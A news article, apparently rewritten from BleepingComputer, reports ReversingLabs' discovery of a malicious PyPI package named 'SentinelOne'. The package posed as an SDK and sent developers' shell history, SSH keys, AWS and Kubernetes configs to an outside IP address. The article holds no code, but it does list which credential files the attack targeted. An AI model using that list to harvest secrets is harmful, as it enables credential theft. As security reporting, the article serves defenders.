>
Investigators have discovered that criminals are impersonating a well-known cybersecurity company in an attempt to steal data from software developers.
Researchers at ReversingLabs recently discovered a malicious Python (opens in new tab) package on PyPI called “SentinelOne”. Named after a well-known United States cybersecurity firm, the package masquerades as a legitimate SDK client that allows easy access to the SentinelOne API from a separate project.
However, the package also contains “api.py” files that contain the malicious code and allow the attackers to exfiltrate sensitive data from the developers to a third-party IP address (54.254.189.27).
Hunting for authentication tokens and API keys
The stolen data includes Bash and Zsh history, SSH keys, .gitconfig files, hosts files, AWS configuration information, Kube configuration information, and others. According to the publication, these directories usually store auth tokens, secrets, and API keys, which would allow threat actors further access to targeted cloud services and server endpoints.
The worst part is that the package does provide the functionality that the developers expect. In reality, this is a hijacked package, which means that unsuspecting developers can use it and fall victim in ignorance. The good news is that ReversingLabs confirmed the package’s malicious intent and, after being reported to both SentinelOne and PyPI, had it removed from the repository.
In the days and weeks leading up to the takedown, the malicious actors were quite active. The package was first uploaded to PyPI on December 11 and has been updated 20 times in less than 10 days.
One of the issues fixed with an update was the inability to exfiltrate data from Linux systems, the researchers found.
It’s hard to tell if anyone fell for the scam, the researchers concluded, since there’s no evidence the package was used in an actual attack. Yet all published versions were downloaded more than 1,000 times.
Through: Beeping computer (opens in new tab)